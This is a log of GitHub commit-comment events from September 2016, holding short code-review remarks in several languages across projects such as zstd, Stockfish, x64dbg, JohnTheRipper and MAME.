{"id":"4543905630","type":"CommitCommentEvent","actor":{"login":"octoploid"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18973365,"position":27,"line":179,"path":"contrib/pzstd/Options.cpp","commit_id":"4c202815c71a18d47a83f1f0109fe1d9b77debb6","created_at":"2016-09-10T11:24:18Z","updated_at":"2016-09-10T11:24:18Z","body":"Yes, I just did some measurements on the 160 \"core\" machine.\r\nCompression speed increases until -n 32. For higher -n speed decreases again. "}},"created_at":"2016-09-10T11:24:18Z"}
{"id":"4543905762","type":"CommitCommentEvent","actor":{"login":"ChessQuake"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18973366,"position":null,"line":null,"path":null,"commit_id":"21b0f5236d2741c1202fa4c9d98ec6d619d6414d","created_at":"2016-09-10T11:24:27Z","updated_at":"2016-09-10T11:24:27Z","body":"Can you please try this at LTC?"}},"created_at":"2016-09-10T11:24:27Z"}
{"id":"4543907404","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18973368,"position":67,"line":85,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T11:25:48Z","updated_at":"2016-09-10T11:25:48Z","body":"The real crash happens here, heap corruption."}},"created_at":"2016-09-10T11:25:48Z"}
{"id":"4543910047","type":"CommitCommentEvent","actor":{"login":"nezzard"},"repo":{"name":"nezzard/test"},"payload":{"comment":{"id":18973370,"position":null,"line":null,"path":null,"commit_id":"4b222876cdbbc9027c91baa86d992b6be9d4481e","created_at":"2016-09-10T11:28:11Z","updated_at":"2016-09-10T11:28:11Z","body":"О молодець шо ти се зробив"}},"created_at":"2016-09-10T11:28:11Z"}
{"id":"4543911425","type":"CommitCommentEvent","actor":{"login":"gekonan"},"repo":{"name":"ibm-cds-labs/hybrid-cloud-tutorial"},"payload":{"comment":{"id":18973371,"position":null,"line":null,"path":null,"commit_id":"d2db4748cfe2003bd09ec4ff6cba9b65c0c9d732","created_at":"2016-09-10T11:29:27Z","updated_at":"2016-09-10T11:29:27Z","body":"Hello @jessmantaro I'm trying to execute the tuto but I'm stucked on \"If you're on Windows or Mac, configure Boot2Docker to provide access to the data.\" boot2docker have been deprecated and I'm not able to execute de the proposed command. Any solution to that?"}},"created_at":"2016-09-10T11:29:27Z"}
{"id":"4543912606","type":"CommitCommentEvent","actor":{"login":"parsaya"},"repo":{"name":"Parsapaya/Parsaya"},"payload":{"comment":{"id":18973373,"position":6,"line":232,"path":"bot/seedbot.lua","commit_id":"01d9e7433819de1c9d8a3db121fb1cb9dd5f2897","created_at":"2016-09-10T11:30:29Z","updated_at":"2016-09-10T11:30:29Z","body":"Sudo users--,{180498474} = sudu_users"}},"created_at":"2016-09-10T11:30:29Z"}
{"id":"4543913611","type":"CommitCommentEvent","actor":{"login":"mrocklin"},"repo":{"name":"dask/distributed"},"payload":{"comment":{"id":18973374,"position":null,"line":null,"path":null,"commit_id":"28c2c52ac853877bf1fbfc7918a596346fe38205","created_at":"2016-09-10T11:31:26Z","updated_at":"2016-09-10T11:31:26Z","body":"Then it looks like you don't have Bokeh installed in the same place from where you're running dask-scheduler.  My guess is that you have two different python installations and the two different libraries are installed in different ones."}},"created_at":"2016-09-10T11:31:26Z"}
{"id":"4543914190","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18973375,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T11:31:59Z","updated_at":"2016-09-10T11:31:59Z","body":"This throws an error:\r\n\r\n```\r\nQObject::disconnect: No such slot LabeledSplitter::AttachTab(QWidget*)\r\n```"}},"created_at":"2016-09-10T11:31:59Z"}
{"id":"4543914273","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"simakova/visualstudio"},"payload":{"comment":{"id":18973376,"position":24,"line":24,"path":"Num2/Num2/Program.cs","commit_id":"cf3d14d96ec24e354623a5d8c869729e6e612395","created_at":"2016-09-10T11:32:03Z","updated_at":"2016-09-10T11:32:03Z","body":"Можно попроще: минимум все равно достигается только двумя путями - a-b-c или a-b*c."}},"created_at":"2016-09-10T11:32:03Z"}
{"id":"4543915146","type":"CommitCommentEvent","actor":{"login":"ringomenoko"},"repo":{"name":"ringomenoko/my_reasearch"},"payload":{"comment":{"id":18973378,"position":4,"line":7,"path":"do_photo_dl.py","commit_id":"05025a16ba7743da11068e131a7f8d5b582cbef8","created_at":"2016-09-10T11:32:44Z","updated_at":"2016-09-10T11:32:44Z","body":"タプル型の変数表記に注意。\r\n```\r\nvalue = ('small') # <- だめ\r\nvalue = ('small',) # <- OK\r\n```"}},"created_at":"2016-09-10T11:32:44Z"}
{"id":"4543916191","type":"CommitCommentEvent","actor":{"login":"qianyan"},"repo":{"name":"ditunes/TddKata"},"payload":{"comment":{"id":18973380,"position":6,"line":6,"path":"RoomTimeKata/RoomTimeKata.iml","commit_id":"04611a16951a020a116ec2e3c30861b0c5b303b5","created_at":"2016-09-10T11:33:39Z","updated_at":"2016-09-10T11:33:39Z","body":"idea编辑器的工程文件不应该提交到代码仓库。"}},"created_at":"2016-09-10T11:33:39Z"}
{"id":"4543916195","type":"CommitCommentEvent","actor":{"login":"yamgent"},"repo":{"name":"INCENDE/rcs"},"payload":{"comment":{"id":18973381,"position":null,"line":null,"path":null,"commit_id":"55163e1c0eccf814e9af199afd751c10b72f890a","created_at":"2016-09-10T11:33:39Z","updated_at":"2016-09-10T11:33:39Z","body":"Nah not spying, just wandering around to see how well you are doing :smirk:"}},"created_at":"2016-09-10T11:33:39Z"}
{"id":"4543916514","type":"CommitCommentEvent","actor":{"login":"ringomenoko"},"repo":{"name":"ringomenoko/my_reasearch"},"payload":{"comment":{"id":18973382,"position":109,"line":240,"path":"src/photo_dl/photo_dl.py","commit_id":"05025a16ba7743da11068e131a7f8d5b582cbef8","created_at":"2016-09-10T11:33:56Z","updated_at":"2016-09-10T11:33:56Z","body":"メソッドの中に関数書くのってどうなんだろうか.."}},"created_at":"2016-09-10T11:33:56Z"}
{"id":"4543918382","type":"CommitCommentEvent","actor":{"login":"evpobr"},"repo":{"name":"erikd/libsndfile"},"payload":{"comment":{"id":18973384,"position":null,"line":null,"path":null,"commit_id":"b38e2c7d7b7cc3c800ee69cc082c9191bff14b7f","created_at":"2016-09-10T11:35:35Z","updated_at":"2016-09-10T11:35:35Z","body":"@erikd, please don't delete commits from remote brunch, it's hard to track. I can push with PR some already deleted changes.\r\n\r\nIt's better to make branch from cmake-config and do whatever you want there."}},"created_at":"2016-09-10T11:35:35Z"}
{"id":"4543918926","type":"CommitCommentEvent","actor":{"login":"ShekharReddy4"},"repo":{"name":"KMITFOSS/openmrs-webgl-globe"},"payload":{"comment":{"id":18973385,"position":null,"line":null,"path":null,"commit_id":"282171580aa39c1dc4677744350d76f030ec72cf","created_at":"2016-09-10T11:36:04Z","updated_at":"2016-09-10T11:36:04Z","body":"when i insert the json with the data appropriate to openmrs the globe showed up but with a different look -which is not as expected.\r\n"}},"created_at":"2016-09-10T11:36:04Z"}
{"id":"4543919175","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18973386,"position":10,"line":160,"path":"src/as400_ssha1_fmt_plug.c","commit_id":"9037a834bc70417318d021426234179c6d49d292","created_at":"2016-09-10T11:36:15Z","updated_at":"2016-09-10T11:36:15Z","body":"The expression is wrong (I will fix it).\r\n```c\r\nif (options.flags & (FLG_FUZZ_CHK | FLG_FUZZ_DUMP_CHK))\r\n```\r\nis the right expression.  The reason it is there is we are 100% assured in fuzz mode to be providing bogus data. There is no reason to emit the warning when fuzzing. We KNOW it is happening.  fuzzing is debugging, so instead of dirtying the screen, I simply am avoiding the message.  However, the same valid will be used for fuzzing, for fuzz dumping AND for normal running."}},"created_at":"2016-09-10T11:36:15Z"}
{"id":"4543919570","type":"CommitCommentEvent","actor":{"login":"FrancescAlted"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18973387,"position":27,"line":179,"path":"contrib/pzstd/Options.cpp","commit_id":"4c202815c71a18d47a83f1f0109fe1d9b77debb6","created_at":"2016-09-10T11:36:37Z","updated_at":"2016-09-10T11:36:37Z","body":"A nice feature would be to use an environment variable to easily allow setting the number of threads to run.  Following OpenMP standard, this could be named something like: `PZSTD_NUM_THREADS`."}},"created_at":"2016-09-10T11:36:37Z"}
{"id":"4543919621","type":"CommitCommentEvent","actor":{"login":"EvilOlaf"},"repo":{"name":"boy0001/FastAsyncWorldedit"},"payload":{"comment":{"id":18973388,"position":null,"line":null,"path":null,"commit_id":"c86f556a03742c31f3e50ef56f34cd790e6aedfb","created_at":"2016-09-10T11:36:40Z","updated_at":"2016-09-10T11:36:40Z","body":"Thx :)"}},"created_at":"2016-09-10T11:36:40Z"}
{"id":"4543919713","type":"CommitCommentEvent","actor":{"login":"erikd"},"repo":{"name":"erikd/libsndfile"},"payload":{"comment":{"id":18973390,"position":null,"line":null,"path":null,"commit_id":"b38e2c7d7b7cc3c800ee69cc082c9191bff14b7f","created_at":"2016-09-10T11:36:45Z","updated_at":"2016-09-10T11:36:45Z","body":"Ok, will do.\r\n"}},"created_at":"2016-09-10T11:36:45Z"}
{"id":"4543920159","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":18973391,"position":null,"line":null,"path":null,"commit_id":"bc194c6da8df04317ea393ac172198a1041f2c64","created_at":"2016-09-10T11:37:11Z","updated_at":"2016-09-10T11:37:11Z","body":"Releted to PR #1742"}},"created_at":"2016-09-10T11:37:11Z"}
{"id":"4543920236","type":"CommitCommentEvent","actor":{"login":"ahedib"},"repo":{"name":"ahedib/Exploratory-Data-Analysis"},"payload":{"comment":{"id":18973392,"position":null,"line":null,"path":null,"commit_id":"4360e4fff04a8794d8e4ebeb0f5659b906edd74c","created_at":"2016-09-10T11:37:16Z","updated_at":"2016-09-10T11:37:16Z","body":"Exploratory Data Analysis assignment 1"}},"created_at":"2016-09-10T11:37:16Z"}
{"id":"4543920420","type":"CommitCommentEvent","actor":{"login":"rahaman786"},"repo":{"name":"rahaman786/hello-world"},"payload":{"comment":{"id":18973393,"position":null,"line":null,"path":null,"commit_id":"e616480b73566dadcc2147c6b784ce77b2f567ba","created_at":"2016-09-10T11:37:26Z","updated_at":"2016-09-10T11:37:26Z","body":"hi gogpi project"}},"created_at":"2016-09-10T11:37:26Z"}
{"id":"4543920717","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"simakova/visualstudio"},"payload":{"comment":{"id":18973394,"position":22,"line":22,"path":"Num2/Num2/Program.cs","commit_id":"cf3d14d96ec24e354623a5d8c869729e6e612395","created_at":"2016-09-10T11:37:44Z","updated_at":"2016-09-10T11:37:44Z","body":"Можно не объявлять эту переменную, можно испльзовать поле Length массива"}},"created_at":"2016-09-10T11:37:44Z"}
{"id":"4543921529","type":"CommitCommentEvent","actor":{"login":"ShekharReddy4"},"repo":{"name":"KMITFOSS/openmrs-webgl-globe"},"payload":{"comment":{"id":18973396,"position":12,"line":117,"path":"globe/index.html","commit_id":"282171580aa39c1dc4677744350d76f030ec72cf","created_at":"2016-09-10T11:38:26Z","updated_at":"2016-09-10T11:38:26Z","body":"@vishnuraom  this changes the title.. this is recommended -so no worries with this change."}},"created_at":"2016-09-10T11:38:26Z"}
{"id":"4543922798","type":"CommitCommentEvent","actor":{"login":"torusrxxx"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18973398,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T11:39:41Z","updated_at":"2016-09-10T11:39:41Z","body":"GUI exceptions don't have a minidump?\n"}},"created_at":"2016-09-10T11:39:41Z"}
{"id":"4543923771","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18973400,"position":null,"line":null,"path":null,"commit_id":"60dd59bb868e141a0adfd724d6ecce16407a64e4","created_at":"2016-09-10T11:40:32Z","updated_at":"2016-09-10T11:40:32Z","body":"现在的添加箭头方式，在鼠标移动时因为刷新率的原因移动上有延迟，不像是跟物品图片一体的一部分，这里有没有更好的解决方法？"}},"created_at":"2016-09-10T11:40:32Z"}
{"id":"4543924671","type":"CommitCommentEvent","actor":{"login":"sinoleaks"},"repo":{"name":"StephanHoyer/magento-lucene"},"payload":{"comment":{"id":18973401,"position":27,"line":22,"path":"app/code/community/Mage/Lucene/Block/Result.php","commit_id":"a8b425e0093aebcd4bc814ed0354663c0ecc96ce","created_at":"2016-09-10T11:41:20Z","updated_at":"2016-09-10T11:41:20Z","body":"u"}},"created_at":"2016-09-10T11:41:20Z"}
{"id":"4543924840","type":"CommitCommentEvent","actor":{"login":"ringomenoko"},"repo":{"name":"ringomenoko/my_reasearch"},"payload":{"comment":{"id":18973402,"position":109,"line":240,"path":"src/photo_dl/photo_dl.py","commit_id":"05025a16ba7743da11068e131a7f8d5b582cbef8","created_at":"2016-09-10T11:41:30Z","updated_at":"2016-09-10T11:41:30Z","body":"関数にネストされた関数を実行する方法があるらしい\r\nhttp://jutememo.blogspot.jp/2008/09/python-f.html"}},"created_at":"2016-09-10T11:41:30Z"}
{"id":"4543925346","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973404,"position":null,"line":null,"path":null,"commit_id":"50dd7c43aecf4af33c45f9924f0a690d6e5fb1ea","created_at":"2016-09-10T11:41:55Z","updated_at":"2016-09-10T11:41:55Z","body":"Also pushbullet \"limit reached\" crashs fixed."}},"created_at":"2016-09-10T11:41:55Z"}
{"id":"4543926717","type":"CommitCommentEvent","actor":{"login":"emmyyusufu"},"repo":{"name":"emmyyusufu/PersonnelCheck-inMVP"},"payload":{"comment":{"id":18973407,"position":null,"line":null,"path":null,"commit_id":"eadc294aff7d00da66e614f8dd899db4825b80a1","created_at":"2016-09-10T11:43:07Z","updated_at":"2016-09-10T11:43:07Z","body":"A Personnel check-in or clock-in Web App built with Angular (in MVP version)."}},"created_at":"2016-09-10T11:43:07Z"}
{"id":"4543927741","type":"CommitCommentEvent","actor":{"login":"killme"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":18973408,"position":null,"line":null,"path":null,"commit_id":"f712a7cb56c70046f20be900b53b23e90b142d43","created_at":"2016-09-10T11:44:03Z","updated_at":"2016-09-10T11:44:03Z","body":"Wow that's nasty.\r\n\r\nRebasing when pulling should never require a force push (and thus is safe) though."}},"created_at":"2016-09-10T11:44:03Z"}
{"id":"4543930669","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973413,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T11:46:42Z","updated_at":"2016-09-10T11:46:42Z","body":"So I found out that it was failing when the lookup contained special characters like the german ä or maybe more relevant for you the spanish ñ. That's why it wasn't working for me most of the time... Fixed now and it'll only show things up to part 3 now."}},"created_at":"2016-09-10T11:46:42Z"}
{"id":"4543931758","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"Silentlys/android_kernel_lenovo_msm8916"},"payload":{"comment":{"id":18973415,"position":null,"line":null,"path":null,"commit_id":"e877bc9c7dae34d5f39f8d5dc1b8bcda510255e3","created_at":"2016-09-10T11:47:47Z","updated_at":"2016-09-10T11:47:47Z","body":"@dev-harsh1998 Is it necessary?I think 64bit is better than 32 bit."}},"created_at":"2016-09-10T11:47:47Z"}
{"id":"4543933476","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973417,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T11:49:20Z","updated_at":"2016-09-10T11:49:20Z","body":"Thanks man!\r\nWhilst you find out more complicated bugs I'm sitting here learning that in Python (2.x), dividing two integers results in only an integer -_-\r\nI took way too long figuring this out and wondering why my % perfection was always zero."}},"created_at":"2016-09-10T11:49:20Z"}
{"id":"4543934540","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18973418,"position":10,"line":160,"path":"src/as400_ssha1_fmt_plug.c","commit_id":"9037a834bc70417318d021426234179c6d49d292","created_at":"2016-09-10T11:50:18Z","updated_at":"2016-09-10T11:50:18Z","body":"Updated the if boolean logic to what I had originally 'wanted'\r\n\r\n2684366"}},"created_at":"2016-09-10T11:50:18Z"}
{"id":"4543935790","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18973421,"position":null,"line":null,"path":null,"commit_id":"5779e69dbdcbfb8666dc9b33d0714784654faa02","created_at":"2016-09-10T11:51:24Z","updated_at":"2016-09-10T11:51:24Z","body":"my personal recommendation here would be that MAME looks in a few more places.\r\n\r\nfor machines (arcade, home etc.) it could look in roms/machines\r\nfor devices it could look in roms/devices\r\n\r\nof course, you could keep the organization you have now, because it will still look in roms/\r\n\r\nhowever it gives you the option if you wanted to avoid any of the system bios / arcade stuff being picked up by the softlist code to move the arcade and system roms into roms/machine where the softlist code won't look.\r\n"}},"created_at":"2016-09-10T11:51:24Z"}
{"id":"4543939846","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"sumoist/basic_course"},"payload":{"comment":{"id":18973425,"position":2,"line":2,"path":"Lesson_5/carriage.rb","commit_id":"b90426f975944ba440914e176b792ce976da0b88","created_at":"2016-09-10T11:55:13Z","updated_at":"2016-09-10T11:55:13Z","body":"Обычно пишут `require` ещё до объявления класса, то есть самой первой строкой в файле, если нет других причин этого не делать."}},"created_at":"2016-09-10T11:55:13Z"}
{"id":"4543941431","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973426,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T11:56:45Z","updated_at":"2016-09-10T11:56:45Z","body":"Not just in Python, at some point every programmer sits in front of a really mysterious bug and after quite some time he (hopefully) finds out about that :D It'll happen again to you, but next time you know your integers and can fix it faster."}},"created_at":"2016-09-10T11:56:45Z"}
{"id":"4543943026","type":"CommitCommentEvent","actor":{"login":"coldtobi"},"repo":{"name":"laserb/gnome-shell-extension-suspend-button"},"payload":{"comment":{"id":18973427,"position":null,"line":null,"path":null,"commit_id":"e4f95d91078f7fc6ba541dc58c1bf90b70179250","created_at":"2016-09-10T11:58:16Z","updated_at":"2016-09-10T11:58:16Z","body":"Actually, this patch is buggy:\r\nThis will install forcefully to a fixed path in the user's home directory. Additionally, you should use $DESTDIR for that, see https://www.gnu.org/prep/standards/html_node/DESTDIR.html and conditionally set it only. \r\nDistributions (like Debian) might need to override DESTDIR to intergrate into their build system :)\r\n\r\nI will provide a patch later, as I need to fix this prior updateing the Debian packge to your latest version.\r\n"}},"created_at":"2016-09-10T11:58:16Z"}
{"id":"4543943200","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18973428,"position":null,"line":null,"path":null,"commit_id":"2d778759ccede32cb55a84eed1f5d97b43ad2394","created_at":"2016-09-10T11:58:24Z","updated_at":"2016-09-10T11:58:24Z","body":"Why has this been changed on 16.08-preX branch?"}},"created_at":"2016-09-10T11:58:24Z"}
{"id":"4543944857","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973429,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T11:59:58Z","updated_at":"2016-09-10T11:59:58Z","body":"http://imgur.com/c5D8TAh\r\n\r\nI'm so proud of myself"}},"created_at":"2016-09-10T11:59:58Z"}
{"id":"4543947920","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973435,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:02:18Z","updated_at":"2016-09-10T12:02:18Z","body":"Wow a 44% Dragonair is actually pretty rare, since they're guaranteed to have one stat at 15 and the others are generally pretty high as well."}},"created_at":"2016-09-10T12:02:18Z"}
{"id":"4543949040","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18973436,"position":null,"line":null,"path":null,"commit_id":"5779e69dbdcbfb8666dc9b33d0714784654faa02","created_at":"2016-09-10T12:03:14Z","updated_at":"2016-09-10T12:03:14Z","body":"As it stands the -verifyxxxxx command checks all \"rompath\" roms for name matches.   If it sees a name match, it checks each container for the roms needed in that instance.  Virtually all the time, there is no 100% same data between MAME game macros and softlists - but in some cases (the VS. Nintendo for instance) -there were partial roms being completed in the form of shared CHR roms, so they were being listed.  We don't list roms you don't have, nor should we assume a person wants new ones which is how -verify work (only shows what you have intended to house).\r\n\r\nThe Atari 5200 + Coleco changes were incidental to the problem.. the 5200 one actually is 100% of the arcade rom, but it didn't make sense to list it the softlist.  The only duplicate romsets we have are the ones which drive the multi-cart usage.\r\n"}},"created_at":"2016-09-10T12:03:14Z"}
{"id":"4543950158","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973437,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:04:00Z","updated_at":"2016-09-10T12:04:00Z","body":"Rare indeed. But at the wrong end of rare haha\r\n\r\nBtw, pokesite happily starts multiple instances on the same port - or more likely doesn't error out if it can't bind the port."}},"created_at":"2016-09-10T12:04:00Z"}
{"id":"4543956243","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18973443,"position":null,"line":null,"path":null,"commit_id":"16422a9480926331ddb089326e9a769f63cc6be9","created_at":"2016-09-10T12:09:13Z","updated_at":"2016-09-10T12:09:13Z","body":"That's smart ;-)\r\n\r\nI didn't even know Travis have too much possibilities, very useful, when i fastly checked the doc for a better understanding, i read that:\r\n> By default, the gh-pages branch is not built unless you add it to the safelist. ;-)"}},"created_at":"2016-09-10T12:09:13Z"}
{"id":"4543956625","type":"CommitCommentEvent","actor":{"login":"wilzbach"},"repo":{"name":"libmir/mir"},"payload":{"comment":{"id":18973444,"position":11,"line":47,"path":"README.md","commit_id":"184db09c3da405fd2a5a09d0beccdb0f8c60dab4","created_at":"2016-09-10T12:09:36Z","updated_at":"2016-09-10T12:09:36Z","body":"Merge conflict? "}},"created_at":"2016-09-10T12:09:36Z"}
{"id":"4543957841","type":"CommitCommentEvent","actor":{"login":"wilzbach"},"repo":{"name":"libmir/mir"},"payload":{"comment":{"id":18973445,"position":122,"line":122,"path":"benchmarks/glas/trsm_bench.d","commit_id":"184db09c3da405fd2a5a09d0beccdb0f8c60dab4","created_at":"2016-09-10T12:10:36Z","updated_at":"2016-09-10T12:10:36Z","body":"Ditto"}},"created_at":"2016-09-10T12:10:36Z"}
{"id":"4543957991","type":"CommitCommentEvent","actor":{"login":"hugocf"},"repo":{"name":"dabd/fpscala"},"payload":{"comment":{"id":18973446,"position":43,"line":78,"path":"src/test/scala/fpinscala/DataStructures.scala","commit_id":"a1835fec4f60fd87ad7c8015d95bcbee8102c473","created_at":"2016-09-10T12:10:47Z","updated_at":"2016-09-10T12:10:47Z","body":"Yes, that's what has been making it harder/taking me more time to figure out properties. That's why you'll find some whacky generators at times :)"}},"created_at":"2016-09-10T12:10:47Z"}
{"id":"4543958859","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18973448,"position":null,"line":null,"path":null,"commit_id":"32db5af63c2af5adf0890efe972fb8662bd4e57e","created_at":"2016-09-10T12:11:31Z","updated_at":"2016-09-10T12:11:31Z","body":"код ревью проведен"}},"created_at":"2016-09-10T12:11:31Z"}
{"id":"4543959089","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973449,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:11:43Z","updated_at":"2016-09-10T12:11:43Z","body":"I know, that's also one reason, why I removed it from main0 and made it separate again. But why do you start multiple instances of it :D ?"}},"created_at":"2016-09-10T12:11:43Z"}
{"id":"4543959527","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":18973450,"position":17,"line":28,"path":"lilacrun","commit_id":"ea0c33e3f9a7e1bab3071bc0496674f051511670","created_at":"2016-09-10T12:12:05Z","updated_at":"2016-09-10T12:12:05Z","body":"弱弱的问一下这里为什么要这么写呢。。"}},"created_at":"2016-09-10T12:12:05Z"}
{"id":"4543959959","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18973451,"position":null,"line":null,"path":null,"commit_id":"6611f596947c2b9d2e508db0ae2e22db397f74e7","created_at":"2016-09-10T12:12:23Z","updated_at":"2016-09-10T12:12:23Z","body":"Why the std::min for the pawndifference? If the strong side has more pawns than the weak side then pawndifference is 0."}},"created_at":"2016-09-10T12:12:23Z"}
{"id":"4543961085","type":"CommitCommentEvent","actor":{"login":"jcalovski"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18973452,"position":null,"line":null,"path":null,"commit_id":"6611f596947c2b9d2e508db0ae2e22db397f74e7","created_at":"2016-09-10T12:13:26Z","updated_at":"2016-09-10T12:13:26Z","body":"oh dang, should be max"}},"created_at":"2016-09-10T12:13:26Z"}
{"id":"4543961301","type":"CommitCommentEvent","actor":{"login":"ringomenoko"},"repo":{"name":"ringomenoko/my_reasearch"},"payload":{"comment":{"id":18973453,"position":5,"line":282,"path":"src/photo_dl/photo_dl.py","commit_id":"808f12e48c1a88849e36e2c0d3db92aada07afda","created_at":"2016-09-10T12:13:38Z","updated_at":"2016-09-10T12:13:38Z","body":"これ意味なかった　ちゃんとintで返してくれる"}},"created_at":"2016-09-10T12:13:38Z"}
{"id":"4543961928","type":"CommitCommentEvent","actor":{"login":"ringomenoko"},"repo":{"name":"ringomenoko/my_reasearch"},"payload":{"comment":{"id":18973454,"position":19,"line":302,"path":"src/photo_dl/photo_dl.py","commit_id":"808f12e48c1a88849e36e2c0d3db92aada07afda","created_at":"2016-09-10T12:14:13Z","updated_at":"2016-09-10T12:14:13Z","body":"小数点以下切り捨てるわけだから0しか帰ってこなかった。\r\n"}},"created_at":"2016-09-10T12:14:13Z"}
{"id":"4543963298","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18973455,"position":null,"line":null,"path":null,"commit_id":"2d778759ccede32cb55a84eed1f5d97b43ad2394","created_at":"2016-09-10T12:15:24Z","updated_at":"2016-09-10T12:15:24Z","body":"Hi, before don`t build (conflict error)  after ok... for you work? Before? \nIl 10/set/2016 13:58, Bernhard Landauer <notifications@github.com> ha scritto:Why has this been changed on 16.08-preX branch?\r\n\r\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-10T12:15:24Z"}
{"id":"4543963943","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18973456,"position":null,"line":null,"path":null,"commit_id":"5779e69dbdcbfb8666dc9b33d0714784654faa02","created_at":"2016-09-10T12:16:01Z","updated_at":"2016-09-10T12:16:01Z","body":"well what I've suggested above would fix that because you could remove all the base sets to 'machine' and the code for verifying the softlist roms wouldn't look in there.\r\n\r\nregular users could ignore it (and probably would) but for your use case it would work.\r\n"}},"created_at":"2016-09-10T12:16:01Z"}
{"id":"4543964326","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973457,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:16:21Z","updated_at":"2016-09-10T12:16:21Z","body":"I realised when I was trying to migrate over to the new version with SQLite and getting all my encounter stuff working.\r\nKept the old version running and forgot to change the port for the new version.\r\n\r\nShouldn't you make it error on failed bind, now that it's not in main0?"}},"created_at":"2016-09-10T12:16:21Z"}
{"id":"4543965958","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18973458,"position":null,"line":null,"path":null,"commit_id":"2d778759ccede32cb55a84eed1f5d97b43ad2394","created_at":"2016-09-10T12:17:41Z","updated_at":"2016-09-10T12:17:41Z","body":"What conflicts do you get? I never had any."}},"created_at":"2016-09-10T12:17:41Z"}
